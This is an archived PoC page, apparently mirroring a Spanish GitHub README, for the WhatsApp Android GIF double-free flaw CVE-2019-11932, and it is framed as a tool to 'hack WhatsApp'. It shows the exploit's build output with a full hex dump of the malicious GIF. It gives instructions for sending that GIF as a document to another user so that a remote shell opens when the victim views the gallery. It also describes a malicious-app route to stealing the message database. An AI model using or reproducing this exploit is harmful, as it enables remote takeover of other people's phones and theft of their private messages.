关联漏洞
标题:Facebook WhatsApp 资源管理错误漏洞 (CVE-2019-11932)Description:Facebook WhatsApp是美国Facebook公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。 基于Android平台的Facebook WhatsApp 2.19.244之前版本中的libpl_droidsonroids_gif 1.2.18之前版本的decoding.c文件的DDGifSlurp函数存在资源管理错误漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务。
Description
Programa para hackear Whatsapp Mediante Gif ,asiendo un exploit con el puerto.
介绍
# CVE-2019-11932
La dirección del sistema () y el gadget deben reemplazarse por la dirección real encontrada por una vulnerabilidad de divulgación de información.
Después de reemplazar la dirección del sistema () y el gadget. Ejecute el código para generar el archivo GIF dañado:
```
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
```
Luego copie el archivo exploit.gif y envíelo como Documento con WhatsApp a otro usuario de WhatsApp. Tenga en cuenta que no debe enviarse como un archivo multimedia, de lo contrario, WhatsApp intenta convertirlo en un MP4 antes de enviarlo. Una vez que el usuario recibe el archivo GIF malicous, no pasará nada hasta que el usuario abra la Galería de WhatsApp para enviar un archivo multimedia a su amigo.
#Intrucciones
>>>>>Vectores de ataque GIF de WhatsApp(Mini noticia y Instrucciones a lo Ultimo)
-----Mini Noticia y iNSTRUCCIONES----
----------------------------------------------------------------------------------------------------------------------------------------
El pirateo de WhatsApp GIF se puede ejecutar de dos maneras
Etapa de privilegio local (de una aplicación de usuario a WhatsApp): se instala una aplicación maliciosa en el dispositivo Android.
La aplicación recopila direcciones de bibliotecas de cigotos y crea un archivo GIF malicioso que resulta en la ejecución de código en WhatsApp.
Esto permite que la aplicación de malware robe archivos del sandbox de WhatsApp, incluida la base de datos de mensajes.
Ejecución remota de código: emparejamiento con una aplicación que tiene una vulnerabilidad de divulgación de información de memoria remota.
El atacante puede recopilar las direcciones de las bibliotecas zygote y crear un archivo GIF malicioso para enviarlo al usuario a través de WhatsApp
(debe ser como un archivo adjunto, no como un imagen a través de Gallery Picker ya que WhatsApp intenta convertir archivos multimedia a MP4 y eso haría que su GIF malicioso sea inútil).
Tan pronto como el usuario abra la vista Galería en WhatsApp, el archivo GIF activará un shell remoto en el contexto de WhatsApp.
Debe leer: 4 Hacks de Fitbit que nunca conociste antes
WhatsApp en el último Android es pirateable
Las versiones de Android 8.1 y 9.0 son explotables, mientras que las versiones anteriores no lo son. El investigador dice que el error doblemente libre aún podría activarse en versiones anteriores del sistema operativo,
pero se produce un bloqueo antes de que se pueda ejecutar un código malicioso para ejecutar un RCE.
GIF malicioso que piratea WhatsApp
Conclusión:
Facebook reconoció el problema de seguridad y ha solucionado el problema en WhatsApp versión 2.19.244. Aunque Facebook trató de hacer que pareciera que no es una gran hazaña, mientras que en realidad es bastante desagradable.
Como siempre, mantenga sus aplicaciones actualizadas y no instale aplicaciones innecesarias.
--------------------------------------------------------Pasos---------------------------------------------------------------------------
Simplemente compila el código en este repositorio. La dirección del sistema () y el gadget deben reemplazarse por la dirección real,encontrada por una vulnerabilidad de divulgación de información que debe descubrir por su cuenta utilizando,otras técnicas antes de que el GIF haga cualquier RCE por usted.Una vez que compila el código mencionado en el enlace anterior, copia el contenido en un archivo GIF y lo envía como Documento con WhatsApp a otro usuario de WhatsApp. Recuerde no enviarlo como un archivo multimedia, de lo contrario, WhatsApp intenta convertirlo en un MP4 antes de enviarlo. Una vez que el usuario recibe el archivo GIF malicioso, no pasará nada hasta que el usuario abra la Galería de WhatsApp para enviar un archivo multimedia a su amigo.
文件快照
[4.0K] /data/pocs/9eabbf663bd07d21628fe5d9152256a3720f3046
├── [1.4M] app-debug.apk
├── [3.4K] egif_lib.c
├── [5.6K] exploit.c
├── [ 11K] gif_lib.h
├── [ 34K] LICENSE
├── [ 42] Makefile
├── [4.0K] MyApplication2
│ ├── [4.0K] app
│ │ ├── [ 13K] app.iml
│ │ ├── [1.3K] build.gradle
│ │ ├── [ 636] CMakeLists.txt
│ │ ├── [ 772] proguard-rules.pro
│ │ └── [4.0K] src
│ │ └── [4.0K] main
│ │ ├── [ 902] AndroidManifest.xml
│ │ ├── [4.0K] assets
│ │ │ ├── [ 97] hang2.double-free.gif
│ │ │ ├── [ 266] not_kitty.double-free.arm64.gif
│ │ │ ├── [ 212] not_kitty.double-free.armv7.gif
│ │ │ ├── [2.6K] not_kitty.mod.gif
│ │ │ └── [ 198] not_kitty_orig.gif
│ │ ├── [4.0K] cpp
│ │ │ └── [4.0K] gif
│ │ │ ├── [3.4K] egif_lib.c
│ │ │ ├── [ 14K] exploit.c
│ │ │ └── [ 12K] gif_lib.h
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] com
│ │ │ └── [4.0K] example
│ │ │ └── [4.0K] myapplication
│ │ │ └── [4.6K] MainActivity.java
│ │ └── [4.0K] res
│ │ ├── [4.0K] drawable
│ │ │ └── [5.6K] ic_launcher_background.xml
│ │ ├── [4.0K] drawable-v24
│ │ │ └── [1.9K] ic_launcher_foreground.xml
│ │ ├── [4.0K] layout
│ │ │ └── [ 813] activity_main.xml
│ │ ├── [4.0K] mipmap-anydpi-v26
│ │ │ ├── [ 276] ic_launcher_round.xml
│ │ │ └── [ 276] ic_launcher.xml
│ │ ├── [4.0K] mipmap-hdpi
│ │ │ ├── [3.0K] ic_launcher.png
│ │ │ └── [4.9K] ic_launcher_round.png
│ │ ├── [4.0K] mipmap-mdpi
│ │ │ ├── [2.0K] ic_launcher.png
│ │ │ └── [2.8K] ic_launcher_round.png
│ │ ├── [4.0K] mipmap-xhdpi
│ │ │ ├── [4.5K] ic_launcher.png
│ │ │ └── [6.9K] ic_launcher_round.png
│ │ ├── [4.0K] mipmap-xxhdpi
│ │ │ ├── [6.3K] ic_launcher.png
│ │ │ └── [ 10K] ic_launcher_round.png
│ │ ├── [4.0K] mipmap-xxxhdpi
│ │ │ ├── [9.0K] ic_launcher.png
│ │ │ └── [ 15K] ic_launcher_round.png
│ │ └── [4.0K] values
│ │ ├── [ 214] colors.xml
│ │ ├── [ 80] strings.xml
│ │ └── [ 394] styles.xml
│ ├── [ 426] build.gradle
│ ├── [4.0K] gradle
│ │ └── [4.0K] wrapper
│ │ ├── [ 53K] gradle-wrapper.jar
│ │ └── [ 238] gradle-wrapper.properties
│ ├── [ 739] gradle.properties
│ ├── [5.2K] gradlew
│ ├── [2.2K] gradlew.bat
│ ├── [ 450] local.properties
│ ├── [ 886] MyApplication2.iml
│ └── [ 16] settings.gradle
└── [4.6K] README.md
24 directories, 48 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。